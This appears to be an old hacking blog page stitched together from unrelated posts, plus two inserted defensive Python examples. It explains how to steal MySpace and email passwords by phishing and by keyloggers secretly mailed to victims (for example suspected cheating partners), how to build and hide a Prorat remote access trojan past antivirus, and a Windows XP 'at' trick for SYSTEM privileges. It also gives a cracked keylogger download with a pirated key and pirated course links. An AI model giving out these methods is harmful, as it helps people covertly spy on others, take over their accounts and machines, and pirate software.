Welcome to My Website



The article below explains the most popular ways used to hack MySpace account passwords. I came across many MySpace password hacking methods, some working, some not. So, I thought of collecting all the working methods of hacking MySpace account passwords in this article.

I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.

So, let's start…

Hack Myspace Account password

1. Myspace Phishing:

I have taken this MySpace hacking method first because I think this is the most popular way to hack a MySpace private account. I studied various surveys taken on the web about hacking MySpace. The results of these surveys show “Phishing” as the most used method to hack MySpace, and note: “Phishing is the favorite method of hackers”. So, friends, beware of phishing. MySpace staff is working hard to stop these phishers. Phishing not only allows you to hack MySpace but also almost any email account. You only have to get the trick used to make a phisher, which I think is very easy. I learnt it without any difficulty. But remember, this is only for educational purposes. I will not extend this topic here, as I have added more on phishing in my article Hack Myspace account password by Myspace Phisher.

2. Keylogging:

This is my second favorite, as the only thing you have to do is remotely install a keylogger (if you don't have any physical access to the victim's computer). Keylogging becomes easier if you have physical access to the victim's computer, as the only thing you have to do is install a keylogger and direct it to your destination so that it sends all recorded MySpace account passwords to that destination. A keylogger records the keystrokes into a log file, and you can then use this log to get the required MySpace password and thus hack the MySpace account. You can use Ardamax keylogger or Winspy Keylogger to hack a MySpace account password.

3. Social engineering:


This sounds like it would not work at first. Even I was neglecting this method. But once, I thought of using it against my friend on Orkut, and I got his Gmail password very easily by this method. I think many of you might know what social engineering is. For newbies, social engineering is a method of retrieving a password or the answer to a security question simply by questioning the victim. You have to be very careful while using this, as the victim must not be aware of your intention. Just ask him cautiously using your logic.

4. Hacker virus:

I did not know about this method used by MySpace hackers until I read this article. I didn't know that viruses are being circulated over MySpace and was considering MySpace safe. But to my surprise, I was wrong. So, friends, be cautious while surfing MySpace.

So far, I have found these MySpace hacking methods to be the best and working ways to hack MySpace account passwords. I never encourage hacking MySpace or any email account… I just wanna make you cognizant of MySpace dangers online. I will appreciate your effort if you mention any other method you found great…

Windows Password Crack

Have you ever tried to log into a Windows computer for a few minutes and you finally realize that you forgot the password?

There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows.

The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5.

Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks.

LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters take longer.

The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.

I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may vary either way.

How it works:

Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute.

Eventually the correct password will be sent and then displayed to the screen.

Good intentions:

  • System administrators can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
  • LC5 can be used to access computers of users who forget passwords.
  • In companies, it can be used to access computers of employees who have left the company.

Bad intentions:

  • Hackers can use LC5 to sniff passwords over networks.
  • Hackers can install this application onto a primary domain controller and steal hundreds of passwords within minutes.

Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty.

Download LC5 (v5.04):

Software License: LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.




Certified Ethical Hacker Certification from Specialized Solutions enables the system administrator with critical information to identify, counter and stop or defend hackers from penetrating the corporate network. With this certification, you will begin to understand how a hacker thinks and what tactics they use to penetrate corporate networks. This allows system administrators to deploy proactive countermeasures and stay ahead of information security developments and exploited vulnerabilities. The Certified Ethical Hacker Training Solution from Specialized Solutions explores the existence and the use of hacking tools and security systems across 21 topical domains. Within each domain, students are presented with several tools that a hacker can use, and which countermeasures are most effective against their use.
>> Ethics and Legal Issues
>>Footprinting Techniques
>>Scanning
>>Enumeration
>>System Hacking
>>Trojans and Backdoors
>>Sniffers
>>Denial of Service
>>Social Engineering
>>Session Hijacking
>>CEH Hacking Web Servers
>>Web Application Vulnerabilities
>>Web Based Password Cracking
>>SQL Injection
>>Hacking Wireless Networks
>>Virus and Worms
>>Hacking Novell
>>Hacking Linux
>>IDS, Firewalls and Honeypots
>>Buffer Overflows
>>Cryptography
>>Penetration Testing Methodologies

Course Details:
Module 00 - CEH Introduction
Module 01 - Introduction to Ethical Hacking
Module 02 - Footprinting
Module 03 - Scanning
Module 04 - Enumeration
Module 05 - System Hacking
Module 06 - Trojans and Backdoors
Module 07 - Sniffers
Module 08 - Denial of Service
Module 09 - Social Engineering
Module 10 - Session Hijacking
Module 11 - Hacking Web Servers
Module 12 - Web Application Vulnerabilities
Module 13 - Web-based Password Cracking Techniques
Module 14 - SQL Injection
Module 15 - Hacking Wireless Networks
Module 16 - Virus and Worms
Module 17 - Physical Security
Module 18 - Linux Hacking
Module 19 - Evading IDS, Firewalls, and Honeypots
Module 20 - Buffer Overflows
Module 21 - Cryptography
Module 22 - Penetration Testing
Self Study Module 23 - Exploit Writing
Self Study Module 24 - Covert Hacking
Self Study Module 25 - Writing Virus Codes
Self Study Module 26 - Advanced Module of Reverse Engineering

Contains 9 CDs in iso format
http://rapidshare.com/files/235489673/c.e.h.c.part01.rar
http://rapidshare.com/files/235489641/c.e.h.c.part02.rar
http://rapidshare.com/files/235489603/c.e.h.c.part03.rar
http://rapidshare.com/files/235489596/c.e.h.c.part04.rar
http://rapidshare.com/files/235490034/c.e.h.c.part05.rar
http://rapidshare.com/files/235490054/c.e.h.c.part06.rar
http://rapidshare.com/files/235490018/c.e.h.c.part07.rar
http://rapidshare.com/files/235490041/c.e.h.c.part08.rar
http://rapidshare.com/files/235490289/c.e.h.c.part09.rar

MySpace is one of the most widely used social networking websites among teenagers and adults across the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready-made software or program that can hack Myspace just by entering the target username or URL. If you come across a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All of them are scams.

The following are the only 2 foolproof methods to hack Myspace.

1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called spy software or a spy program.

2. Where is keylogger program available?

There are tons of keyloggers on the internet, but most of them are useless and don’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspace since it supports remote installation.

http://www.sniperspy.com/

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At installation time, you need to set your secret password and hotkey combination to unhide the keylogger program whenever it is needed. This is because, after installation, the keylogger becomes completely invisible and starts running in the background. Because of its stealth behaviour, the victim can never come to know about the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer, because SniperSpy offers a Remote Installation Feature. So, you can hack Myspace by remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What if the target user (victim) refuses to run the attached file?

Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

If you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link:
http://www.sniperspy.com/

2. HOW TO HACK MYSPACE – Other Ways

Phishing

Phishing is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled into believing the fake Myspace page to be the real one and enters his/her password. But once the user attempts to log in through these pages, his/her Myspace login details are stolen.
Phishing has proved to be the most effective way to hack Myspace and also has a high success rate. The reason for this is quite simple: the users are not aware of the phishing attack. Also, the users are fooled since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.

Hello friends. I am back with a completely new hacking topic - hacking a computer remotely. In this article on remote computer hacking, I will inform you about hacking software used to hack a computer remotely. This software, called "Prorat", is a RAT (Remote Administration Tool) used to hack a computer remotely.
Hack computer remotely

RATs :


RATs, also called Remote Administration Tools, are popularly used software to control another computer remotely and, considering hacking aspects, to hack a computer remotely. There are many RATs such as:
Prorat
Turkojan
Yuri RAT and many other.

Working of RATs:


To hack a computer remotely using a RAT, you have to create a server and then send this server to the victim whose computer you want to hack remotely. Generally, this server is bound to a file, say a picture or song, so that whenever the victim opens this file on his computer, our server is installed. This server opens a port on the victim's computer, and by using this opened port, you are able to hack the computer remotely.

It is this RAT server that then sends all system information to PRORAT and we can then hack computer remotely using PRORAT.

Things you can do by hacking computer remotely:


Once you gain access to remote computer, you can hack computer remotely and perform any of following:

# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of system registry
# Hack locally stored passwords and licence keys
# Download additional malware and servers to gain stronger control
# Control and access all Control Panel options (including add or remove programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection and start file transaction

Thus, you are able to hack computer remotely 100%. This software to hack computer remotely is hence very popular.

Disadvantage of remote hacking software RAT:


The main disadvantage of this software (RAT) is that the server created to hack a computer remotely is recognized by most antiviruses as a hacktool, and hence antiviruses send alert messages when the RAT server is installed.
But there are many programs like Binders or Crypters to hide the RAT server and prevent antiviruses from sending alerts. There are even programs like AVkiller which are used to turn the antivirus inactive, and then our server (used to hack the computer remotely) can be installed on the victim's computer very easily.

This is all about RATs - software to hack a computer remotely. In my next article, I will inform you about server creation and installation on a remote computer. If you have any problem with this article on how to hack a computer remotely, please mention it in the comments section.


Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. This log file can then be used to hack anyone's email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access, or one can use this tool to hack someone's hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address; access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security - allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Download:
http://rapidshare.com/files/47779604/Setup.rar
[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]

Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT


As a reference to my post Hacking "Admin" from "User" mode & more[XP], where I have explained how to hack any Windows XP password from a user account, this is a small but very useful XP hacking tutorial which emphasizes the method used to change/hack the Windows XP administrator password if you don't have access to the admin account (Student account).

Just follow the steps given below:

1. Start-->Run-->lusrmgr.msc and press Enter or OK.
2. Then there are two folders: Users & Groups. You need Users; in this folder, right-click on Administrator-->Set New Password!

So, you are now able to hack into any Windows XP administrator account even when it is password protected. Just follow the hack and you will be able to bypass/hack the password, in fact change the administrator account password.


Warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol

There are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting [ctl-alt-del] when the password box is displayed, or simply turning off java capability, which will dump you into the default page. You can try manually searching for other directories by typing the directory name into the url address box of your browser, ie: you want access to www.target.com.

Try typing www.target.com/images (almost every web site has an images directory). This will put you into the images directory and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif. There is a good chance, then, that there is a ‘games’ directory on the site, so you would then type in www.target.com/games, and if it is a valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all directories, or even mirror a complete server. They are indispensable for locating hidden files and directories.

What do you do if you can’t get past an opening “Password Required” box? First do a WHOIS lookup for the site. In our example, www.target.com. We find it’s hosted by www.host.com at 100.100.100.1.

We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K (not many HTML pages are bigger than this). This speeds things up some, and keeps you from getting a lot of files and images you don’t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let’s say we find /target/games/zip/zipindex.html. This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here. By simply typing in the url www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading.
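The walkthrough above works only because the password box runs in the browser and the server lists directory contents. The following is an added example (not part of the original post) of the server-side counterpart: every request under the members area is checked on the server, and directory URLs never return a listing. The page names reuse the article's example; the signed-cookie scheme, `SECRET` and the `/login` URL are assumptions made for the illustration.

```python
import hashlib
import hmac
from http.cookies import SimpleCookie

# Constructed sample site (path -> body); names mirror the article's example.
PAGES = {
    "/index.html": b"public home page",
    "/images/gamestitle.gif": b"GIF89a...",
    "/games/zip/zipindex.html": b"members-only download index",
}
PROTECTED_PREFIX = "/games/"   # assumption: everything below this is members-only
SECRET = b"demo-only-secret"   # assumption: a random per-deployment key in practice


def sign_session(user):
    """Issue a cookie value the server can verify later: user.hmac(user)."""
    mac = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{mac}"


def session_user(environ):
    """Return the authenticated user, or None if the cookie is absent or forged."""
    cookie = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    if "session" not in cookie:
        return None
    user, _, mac = cookie["session"].value.rpartition(".")
    expected = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    ok = hmac.compare_digest(mac.encode(), expected.encode())
    return user if user and ok else None


def app(environ, start_response):
    """Minimal WSGI application with the two controls the walkthrough relies on missing."""
    path = environ.get("PATH_INFO", "/")
    # 1. Authorization is decided on the server for every protected URL,
    #    so knowing or guessing the final address is not enough.
    if path.startswith(PROTECTED_PREFIX) and session_user(environ) is None:
        start_response("302 Found", [("Location", "/login")])
        return [b""]
    # 2. Directory URLs never produce an automatic file listing.
    if path.endswith("/"):
        start_response("403 Forbidden", [("Content-Type", "text/plain")])
        return [b"directory listing disabled"]
    body = PAGES.get(path)
    if body is None:
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found"]
    start_response("200 OK", [("Content-Type", "application/octet-stream")])
    return [body]


def request(path, cookie=None):
    """Call the app in-process (no sockets) and return (status, body)."""
    seen = {}
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path}
    if cookie:
        environ["HTTP_COOKIE"] = f"session={cookie}"
    body = b"".join(app(environ, lambda status, headers: seen.update(status=status)))
    return seen["status"], body


if __name__ == "__main__":
    for p in ("/images/", "/games/zip/zipindex.html"):
        print(p, request(p)[0])
    print("with session:", request("/games/zip/zipindex.html", sign_session("alice"))[0])
```
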




Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized manual fr u guys. may help a lot

• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol (SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses

Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain Impersonation
• Impersonation of other Users - Hijacking kernel tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image files
• Attacking email vectors (Lotus Notes and Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003 & Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with covert channels through IPSec VPNs
• Hijack and capture SSL traffic

Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an organization
• Inspect changes to whois record over last 3 years
• Windows 2003 Server & Vista DNS Cache Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP




really that is possible !

u know why is it a “user” account? because it lacks some service layer than that in “administrator” account

Using simple command line tools on a machine running Windows XP, we will obtain system level privileges and run the entire explorer process (Desktop), so that it and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and its kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager.

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in an error message. The following quote from Wikipedia explains this in an easy to understand way:

You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.* in the root directory of the “Windows” drive, then reboot. The system may run Program.* with system level privileges, so long as one of the applications in the “Program Files” directory is a startup app. The call to “Program Files” will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Nowadays, more and more of the startup applications are being coded to use limited privileges.
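As an added example (not from the original post): the interception described above depends on an auto-start command line that contains spaces and is not quoted, in which case Windows tries the shorter path first. The audit below flags such entries, lists the paths that must not exist or be writable by ordinary users, and produces the quoted form that removes the ambiguity. The entry names and paths are constructed samples.

```python
import re

# Constructed sample of auto-start entries (name -> command line), shaped like
# the service ImagePath / Run values an administrator would export for review.
SAMPLE_ENTRIES = {
    "AcmeUpdater": r"C:\Program Files\Acme Tools\updater.exe -silent",
    "QuotedSvc": r'"C:\Program Files\Vendor\svc.exe" /run',
    "Spooler": r"C:\WINDOWS\system32\spoolsv.exe",
    "BackupAgent": r"D:\Backup Agent\agent.exe",
}

# End of the executable name: a known extension followed by whitespace or end of string.
_EXE_END = re.compile(r"\.(exe|com|bat|cmd)(?=\s|$)", re.IGNORECASE)


def executable_part(command_line):
    """Return the unquoted executable path, or None when the path is quoted."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        return None  # quoted: Windows parses the path unambiguously
    m = _EXE_END.search(cmd)
    # Without a recognisable extension, fall back to the first token.
    return cmd[: m.end()] if m else cmd.split(" ", 1)[0]


def shadow_candidates(command_line):
    r"""List the shorter paths Windows tries first for an unquoted command line.

    For C:\Program Files\Acme Tools\updater.exe these are C:\Program.exe and
    C:\Program Files\Acme.exe, both tried before the intended file.
    """
    exe = executable_part(command_line)
    if exe is None or " " not in exe:
        return []
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def quoted(command_line):
    """Return the command line with its executable path wrapped in quotes."""
    exe = executable_part(command_line)
    if exe is None:
        return command_line
    return f'"{exe}"{command_line.strip()[len(exe):]}'


def audit(entries):
    """Return {entry name: [paths that must not exist or be user-writable]}."""
    findings = {}
    for name, cmd in entries.items():
        candidates = shadow_candidates(cmd)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for name, paths in audit(SAMPLE_ENTRIES).items():
        print(f"{name}: unquoted path, check {paths}")
        print(f"  fix: {quoted(SAMPLE_ENTRIES[name])}")
```
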

Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.

Under normal circumstances, a user cannot run code as System; only the operating system itself has this ability. But by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.

Getting SYSTEM

I will now walk you through the process of obtaining SYSTEM privileges.
To start, let's open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive "cmd.exe"

Let's break down the preceding code. The “at” told the machine to run the at command; everything after that are the operators for the command. The important thing here is to change the time (24 hour format) to one minute after the time currently set on your computer's clock. For example: if your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30), then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe

A desktop will come back up, but what's this? It isn’t your desktop. Go to the start menu and look at the user name; it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop is to log out and then log back in.

System user name on start menu

explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too: browsers, games, etc. You also have the ability to reset the administrator's password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; you are now God of the Windows machine. I’ll leave the rest up to your imagination.

ADMINISTRATOR IN WELCOME SCREEN.

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the “Welcome Screen” does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled
Then follow the instructions from the “Win2000 Logon Screen Tweak”, i.e.:
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor and go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Right-click an empty space in the right pane and select New > DWORD Value. Name the new value Administrator. Double-click this new value, and enter 1 as its Value data. Close the registry editor and restart.

dont hack others buddy be ethical !!!  ... lolz ;)




There are two ways to change your IP on Windows: the easy way and the hard way. I'll discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it works if your NIC (Network Interface Card) supports cloning your MAC address. If this is the case, then go to

Start > Control Panel > Network Connections

Right-click on your NIC and go to Properties. Then click the button labeled Configure. It should bring up another form. Click on the Advanced tab. Under Property you should see “Locally Administered Address” or “Network Address”. Click the radio button next to the text box, and type in your new MAC address. (Note: you do not use the “-” when you enter your new MAC address.)

To check and see if it worked or not go to

Start > Run > and type in “cmd”

When the terminal comes up issue the command.

ipconfig /all
———————————————————————————————————————————————–

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in “cmd”

Once the terminal comes up type in

“net config rdr”

It should bring up a lot of things, but what you are looking for is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in “regedt32”

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the “NetCfgInstanceId” Key with the number you wrote down earlier. Once you find a match double click on the key “NetworkAddress” and change the value to your new MAC address. Hit ok and reboot your system.

There are several ways you can determine your IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that you can send the information to a text file (IPCONFIG /ALL > c:\ip.txt)
But sometimes the window shows so much information that you need to scroll around to find it.

VIEW STATUS

Control Panel / Network Connections / Double-click the icon for your network (if the network has an icon in the system tray you can also just double-click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When you try to send pictures through e-mail, you should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If you would like to create an icon to suspend your computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name you want
Now when you click on that shortcut, your computer will shut down and suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, you are only allowed to create administrators or limited users.
If you want to create

Right click on My Computer
Manage
Local Users and Groups
Users
Right click on the user you want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here you see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::

some more
Determining Which Services Are Associated with SVCHOST

Since so many critical services are run with each svchost,
you can see which ones are being used by opening a cmd prompt and running:

tasklist /svc /fi "imagename eq svchost.exe"

